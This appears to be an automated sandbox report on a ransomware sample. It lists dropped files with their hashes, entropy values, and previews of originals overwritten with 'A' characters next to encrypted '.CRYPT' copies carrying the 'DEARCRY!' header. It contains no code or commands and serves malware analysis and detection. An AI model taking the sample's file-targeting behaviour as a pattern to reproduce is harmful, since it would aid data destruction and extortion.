                                                            Preview: DEARCRY!.....s...v.5$.w...........b.(...A..xP.3.c....|~N!........L%.......Cv..<..%?.s....c>..@O.Z...#..k<j.>...<._..j.....%:.&..h1`u.A.,.!.|C.a..22..'[!h1.=.R.WH....:.....@.y\.a..b.~.G......\D.......{...4-.B......O[.@:.._k...7.<{...#..>....H.W..*.p.Q.1zN.............-..j.7..lJ..s.....]$.X...T.W+.....M..`.[.=..5....).?9.Ok.......>....P.......y[j\t.F^Gu.N..G......l.%........gv..1......:z..N.......<.
                                                            C:\ProgramData\Adobe\ARM\ArmReport.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):866
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkki:YQ
                                                            MD5:683DD543B58FFED4F679C40960873D60
                                                            SHA1:3AE4229602CF030848ADC22820AFCA614CF55D57
                                                            SHA-256:D0941600D56684A2BAC0D8C5B0034FFF23C0BED9F53C27B46D90CA462B07307E
                                                            SHA-512:749ABB1F0685FEE6402555795AA64F98E040F7FD0D034EFA4BD685C0BAC9B26C98AD3C8EB333C3A1FF71A97F476DDAAD26C40EF71062C3A942AA1A3C9E105121
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Adobe\ARM\ArmReport.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1160
                                                            Entropy (8bit):7.830557421959485
                                                            Encrypted:false
                                                            SSDEEP:24:l92nfiTi7ZvjIItPL9PzBeSc4epLrWFqDGwqjd1SKzZNoTEJF0bE:diBxpr8Sxet6FAGTjdFnJEE
                                                            MD5:F5475C46E6156B8FADE98BDDD7FCB47C
                                                            SHA1:C5E584493B8D0B58C71EA46C09CE4BBE8B5E83B2
                                                            SHA-256:D1C804BDEE600BA17273D8BBD8899AA9F8443A131FE1E7EF02E04536C8EAD7C3
                                                            SHA-512:3C189B62475E213F79BBB8819F9C5E68C57DA3588D8B287B2CACD682C68CBAF98D383550F148F70288D1E6B91DDF21A2C10E96C79857481B08F137BEEACC2BCF
                                                            Malicious:false
                                                            Preview: DEARCRY!....P<5S.L. ..Y..9....h..Z..0..,.P..l...._v..:....i..........#+...d...."/l...j...9...\]..S6{i...b..P?...o.{..T.?.%3..M...g.4`......r...%^..T?..B...Z^.&..kw7L...ZR.A....+*...>...&H.}O... .......'...mF....T....y...K.[.hz.......5h..0.^..E.C.......LR.....b..........&M6..R...=....!....LVjb.sl.....x..F4}....I}.^...]{4n..%.!..........3..s.o....5.....J.C.e*.....2.=..k..t.+.....-^........7.....).M.@..Dyf>.n.j.5qMQf......>R.LPg........'......6........:.[N.f.....7w..v.@.E.Q.".....SG..N. ..]j..(...B.Q.jq..a..e..Kru.Zkohx.......D..{..$........Q....`.(..1n#..G.716r.=......l.4..EEh..S4~.F)^..t..b...=.m..h.*$.D.^T-W..D..:t.D.WR&g.~...N....y...v.k. .r..._.m.Y.#y.J.^.j"`.3..Y..wN@..p.l:I....GS.-.Aav..l!.D..ya\+.#-%..i_..Ns....".0.9...j.Kt...i..'.]..E.}...........3.:.^..%..oG..:..5..*F.=.......D.....}..Z.}......6Z....B..j]o.O....yt.N.Ju.......E.l|eG..T....g.>...t....7.`p...#..b...g.jVsz..e....#..V.Xg..e.7.....hTf65yC.....$R.. ...'...7.uvOF.r..
                                                            C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\abcpy.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):608
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:WttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkQ:YO
                                                            MD5:8603AAE2A9433EC411EA7D3461EC572B
                                                            SHA1:B83FAA503BB5B2A46D3CD9A4D21F9137BEB42B91
                                                            SHA-256:884BC61731251D341B969EFF97C65413CD93D3DAD84C835EBFD711D8C9CA3A54
                                                            SHA-512:F36302B338C9C07F9A9F1DEED98F068EB86D6C94B56FB0D575687384352CC1C3CE9BDA8750A11B68A0A0AF9AFF9D2FE6BC652C9753E2B2B49A33477B346771D7
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\abcpy.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):904
                                                            Entropy (8bit):7.793321592777127
                                                            Encrypted:false
                                                            SSDEEP:24:flzDSNNC7qn9WEaVqK0gz14H51F96NXr2ShiZ:flz1y9VaVqK/ufoX6SoZ
                                                            MD5:F9C634A7A2CD90540504B1536C0DE6DF
                                                            SHA1:41007440D5AE727D6F1F62F1B529634F88520272
                                                            SHA-256:AC6FB5311ECD8108933FB2C10B871DA6663E198BB0D3F3145AE22E372636E6D4
                                                            SHA-512:12BB9EA6E8A70F9687E5B0B5551C07CEE98783021BAAE5C62E119FBB446CD915106ED1D87FC6BF8588AEB2DAFBB123BC3D33E42BBBFD014A54D906087A187169
                                                            Malicious:false
                                                            Preview: DEARCRY!.....\`.G.o..w..(:..nn.Y.$..o..bV.....w...AX6.^{....g.g.9.p.9aH.....yC/n.6..Hmu..ER.............{:.r..PKs6.u....c0..M...zz~.\...oq.G.Z...Rzz..u..c..Z..z<.;...l;..........EA.fPf....<..h.f.z.ZlBW~.B~..^.1.i......a X(&'.....>DKT..o`".,....Z]..a......`..........:..u.\o.%L=.Ff.c.Y.-.w{.......b....q*M+...xp.....Q....:p.({+V..}zb.t...T.F3w. ..82.%...0`...Ff\V.9.F..[R......0......R....w.......V+......v..sNW..9.o?Q..s.....H.d..]r..).f.+ U.zR.u..3Z_..BC..?.L.e..+.".[.3.#a.Q@/+../.zq!r.&....S...6H...}...J`..9P.[...3n..D...l*.&.....$....5O..Wq....h.N6.t..D.T..e%.X.&.S....8.Z.....Z.h......m.?.N.D....}zB.b....{'......n..<y....:..3..4aS&.!.);ry."...D.b#....n...4/..j.../.q..........$..3i.RP.H........`k....cv..Cc.n....C".i.4./t..j&..........I csh...H..Ia.`..Y-j..03.j.....,.yM.! ..c...,.q.m....:...z.,"K.9.R.....$F....s.^.D..%..v.a.. ..M8.P......|..3..
                                                            C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):214
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkm:Y0
                                                            MD5:D4019C6CB58AE0DFDEC1AA92FDE90415
                                                            SHA1:36315FB6D2E06DC73CC15C191A30E76AC09B3D6C
                                                            SHA-256:6BF207754DB6B212A391E63428AB267D4648446443B2EB1583C9F09AEAACF096
                                                            SHA-512:2B4BE5852CAEEFF9804CF8DACC60B95B80B4211081A4F8C5D6DD805C65476427B2DEC48F61521F1FCDAB90085EC0DB759BFDF1F91BD37F30F0FF11EDD1484ABB
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):504
                                                            Entropy (8bit):7.479305454039198
                                                            Encrypted:false
                                                            SSDEEP:12:rOLXn9jN3hGyugyk/KCPDUoe8Z+uJzZT/6fxWXCm3UTMphQT8a/g:QXn9jN3hGyLyWKG48Z+uBZGfMSm3U4pp
                                                            MD5:E56A02BFCC0FD70A03755576525AFE01
                                                            SHA1:C668B79FDAA6C247EFC6472CF6E17252CDF8566B
                                                            SHA-256:1C5723D266E09395EB0E07640A74953104014FB09780C843FD683AF8A4754C74
                                                            SHA-512:2B3DD4B702C7E9A0A5DE252A351D683D6A50AEBC7BDCED2683BB72D09492F21AF9033488BEEA5CF9E0489C6FED8F3733D38961FC9668D76332FA21796886C4BF
                                                            Malicious:false
                                                            Preview: DEARCRY!......}h.T....(..3C\..k.c.n. Sm..jL......./..ri...+...u.JYA.C...n...b.....[..._..y....N..<C....s..u.X.f.....w..Y..1.....giX).,....&......3........o.q.Ek_...........v1...cE|...^.MY..#...y..!9.K...=c)..[..y.xf.....-.}.S...P-et..PHt....uO.U.).Z..dZ..............t........?.P..T..p..x..N.2#..,......d(.y...x...ME...mO*.]..S....r.H#.....9*.Q.r.d.....-..5P...l....D.7..L.U.LF....i....j..~u0....O...~k7...Q..fv....1......X..b..`...0...2...!.(.o.O.,W=..'.U.<...j.........
                                                            C:\ProgramData\Microsoft OneDrive\setup\refcount.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):25
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkn:YT
                                                            MD5:1995DA96CD16A48CEBCBC08424F6F945
                                                            SHA1:A92B995E293D295C4BBAB7043CCCB030BEF47488
                                                            SHA-256:6724431FC312BA42C98B38B8595A49749419526AA89722C77A85C6C813DFDB5A
                                                            SHA-512:04704D934BBD42582FE7D6FB96E1ED8CF36ABD1A43466B39A00A6D87DE7681501081D4EF69FF4C9FA1CDF0CF36BD32AF6FF24994ED059A6F1D7E722C3A4F90B0
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft OneDrive\setup\refcount.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):312
                                                            Entropy (8bit):7.194706544795244
                                                            Encrypted:false
                                                            SSDEEP:6:rOkMdjZ6QFrm35znW2zYcwc9PKdpKDpysEXYXB1dfoq6aRAs0XfQDXAKJeb:rOBjc5znWRc9PKd4pysEXYRTgXaRAnXf
                                                            MD5:EF31C94AFB8663E863415A9689D59B20
                                                            SHA1:A68E557CA2FA2A18DA57F704D1E4A8D6FFFFC01F
                                                            SHA-256:F20A1E28959808FDEE1E82D6D72B2797885A9C1DDCD93498ABBAF8B0C1E4EF62
                                                            SHA-512:419D6E73DD10A2B6F586D789876789BAC18664B33FD2A465412D88F16BCBCF5BA248F499C21CE4C4743367D47D77B6FB1851DB21DB759D3C178FB07814783FDD
                                                            Malicious:false
                                                            Preview: DEARCRY!....../.a./.....U..kP.~..65T....:Ux...j@.3af.FR......O.WB.Y............w...&...V...}..>........x.T..L@^../.o..]..#..0.X..6..\9\5x....X2........Q..jqJ<].p..K{=.g.O..oA...B...h^....+]...:Z.Y...haE.`!g...k...s.Z....6...U....o..TEs.{...z....h.l..../..G$............&fbc..2...reo.{l........Y...~
                                                            C:\ProgramData\Microsoft\Diagnosis\WindowsAnalytics\analyticsevents.dat
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):876
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkks:YK
                                                            MD5:143116A4EC10866DF93B12F65DB3C393
                                                            SHA1:7757C51AF3E48024C7D5FA03830D45D7304599C5
                                                            SHA-256:6915A95BAB526955821B4206744186AF1BFA7329064049D08FDF47FE31012DD6
                                                            SHA-512:216B73D32360D21A8BE57690A29C0E1E24B2D3837AF81FEAFAC215F71AC28B327F615129BEAB19466A668CE6E67F66338D1CFFD5D16C7926E68459F39FE71DA6
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Diagnosis\WindowsAnalytics\analyticsevents.dat.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1160
                                                            Entropy (8bit):7.842446149334136
                                                            Encrypted:false
                                                            SSDEEP:24:WqZcIKOLrGdw7LitlxwnSzogtsU/wYeFLUFGdIt9qo8YCzM2ZpR:5dKOLrGdw7m/xwg+IwYRGdI4jB
                                                            MD5:146D2530D6DA11138EEEBC43F8BAB301
                                                            SHA1:F3B0DB11E5F60B158802B76811F030138EC7E345
                                                            SHA-256:705D2AEB7439B6AFBAC7F57709CCE2E640D278445A5695257CFA988EF9D53733
                                                            SHA-512:49061EF8662CAF406B8DBF42CC915504FE0098D4ADF80346A3C1FC93D21E5E930C5ED5ED5E59D6A0CDFFA726CF2C1159D4DC4B0CFF536C607F17988149861DB7
                                                            Malicious:false
                                                            Preview: DEARCRY!.....a.....G.L.Q.......o..P.o0=. .3>.J/,.2v(u_Jgr..[.nC...%Z&D.....Nf;GUU.y>..g.N}....t...ij.5...<.E;...u..a........Z.c...-....J...Q.....F1..WG..r:...T*t.".p.{?.#04Sc.,.g.1D^9.;+.Q..q.......:....t...Oy\.v].2.J~$....g./.m...../.... Z.@ ..T..k&*dI.Y......l............Cb...X.\v$...S.r.c..g.:.....0.vz8...fh.60...3...aH.........z..z3.....q.Mx.|s0l.9...s..h..[...,^$r.!..^y...m..^(v .v.G..v.......d..e./...A.5..6./*Z....3D`....ID....T$..(.\.`.-7.......b... ..\..0..>.V...GQ...i.Qwo...+P.Y#~....l.J...q..JM....h..........4.....f.9.....a...W..e....4.m.P.d.w.;...UR.y..A7......df.E.=)n.M@.%$...1.=q..].h$.iML.52@.o..c.eUrQ.N....\.C[..L.U$...&........#.!..d(..T..1$...In..j.!.^.G....L>....9.vZ..[.....{#......R.9.'...h.V..~.....h(._H..zJ...d..pPO|..B......J#Y..U].ZL.BGp..........PO$.g3^.{..&h2...;Hk...w}w.....[..y"..5.LqT.9.M.......N.s..9T....o6w..g....O-.$.K..3..o.d..jv..9.[*.[...L:...t.IX5..5$.q..+.]R...m.u.{.%S8a.cN.;.m....fb`*.1...@._.G.8c.#....t.
                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):9175040
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkw:Yu
                                                            MD5:3FB1504A33A72412644E806E1D69F80D
                                                            SHA1:74763DF4FB95028FE4FD3BBFC8783BFD4057E3F5
                                                            SHA-256:7B233FE889D635760205ED98291B50481667E0FD5505C21397AF60BB1D9EC082
                                                            SHA-512:A71F70819F5B7314A8CD14EDAFA33826E9598023FD26955C5935A633ABF27FF21FA85D4EE2648F78DFD15B2FEFCDD8833EE8F8E14B6309C47CEED83B70072D2C
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):9177112
                                                            Entropy (8bit):7.9999804885789185
                                                            Encrypted:true
                                                            SSDEEP:196608:g8clAvoQ784t/nDONMPUonuOvv7MRuSs30Cz6wHpHlL0j5ZirULB9Sl6z5aL2sI:gVAzNQUgRuOwHpHl4jfirULU6z5aTI
                                                            MD5:94AEC24C3032C94E8D7CFD7464F1153F
                                                            SHA1:F68EC2B059DEFFB02C80E900CDD2B9830B395859
                                                            SHA-256:AEE816035C4AA4A39EC45B9178ACA7C42DEE871AAE103EBF94A14B9D426947D7
                                                            SHA-512:91855A319A1EA989D4805D6D8D5B98581B8C068C5EA22321349E8A6B2C653B4400EB770700CE8D0F2F88618D8D1B2298277F066CAA5371023BC53CCB0A0AC347
                                                            Malicious:true
                                                            Preview: DEARCRY!....b.c..3.<.U....B.yq..4|c.8E..H]....=.g..n..i...E.A@h..C.. .>..!....l...pS.D..Y8.c.p.Usqtw.,.....4.N..W..w.].>/..e7..r@.DP..rF>.L.u.....$L[2......*.T;....Q'.v.v.F4....-.)r.i.....R.L...1W.Ld96.WY..~.w.....P.e....Q..5..8^..%2...+Fs|.....%...0[...m............<j;...0.y.K.2..KV...m.Y.......r/..M....(0.G.....7e.....F..&...7...f.....*)?../.y-.....I.U.`G>.$r..7M s.G.@.....{......b....y..b77...QOw.}........A-.....|fZ]...Zy....4.8....)u..2..E.@.~.8..a.~kx......?.j.;.I.T-.v8/..gz./.7.2..P^...<H*..$....6T..C.^..J...j....L.....5..j..a;( .GG..<.....F.e. m.TsA]j.).X.0...[.r.....3.. ..C*L..L..Q+i.g..P...%.\...}..n.i.o.5.J.E...vmr.......q.sbm.A=v.6...ZX..#...)g..tRL......e.n..>aX....a....5..........i...F....../..........rW.M...p....M.~.?.."..BI...$2...K{..j+.RW.I5.....j.qT....mp.F...D..;.....T...0.+..].W.I...G/U....>.W.NS.=(uo.`..@.Vp..v.}aq..q.#.../.J.....z......u:q.....m_7S....2.mS\C..sR./i]]y...:,\..V0...k)t...s.k....k_....X..w.
                                                            C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):1310720
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkw:Yu
                                                            MD5:ED70F35C3696BB5CC695413D92911D36
                                                            SHA1:D788F956C66DC3C2DFCCBCD6344096B5DD3E6B1D
                                                            SHA-256:8CAF8BA097A2A2B4D9091C9AB1F2BC928A5D4045ABA1C10755B21CE1A158ABB9
                                                            SHA-512:C5802AB4C443CD24159383397CFB8D0DBC903A6374A885EEFAEBC01973A57C681AA6DE722348CDD31DF0AEFAA57622DC24118276F44F07030614E8D2021FB10D
                                                            Malicious:true
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1311016
                                                            Entropy (8bit):7.999833684473793
                                                            Encrypted:true
                                                            SSDEEP:24576:ZysuY+tHU8b8H76pyC5as6e4TNVPlGUpw1OSNrdJw+BJbxlB3Verdq:ZqjtHB8H76xI+4TNVNUBxLlupq
                                                            MD5:7E5E443696B9F9D7409FE289D16344EB
                                                            SHA1:3B9DF18D94D9BE72AF12766B781AE0394695D1D3
                                                            SHA-256:1E58BB3218FCBA4F312EDAAD2B95ADDC8415A8E5C3E0266291AF2C096FC0A23E
                                                            SHA-512:B7CA897EBF06CB032C79C0D975E96079916575AB8A8489A59708CD8B109DCAE704FA32FAC75FA375F4D9CC7A55E11BDE1EE7302D5149C865355E7154AF34FFA7
                                                            Malicious:true
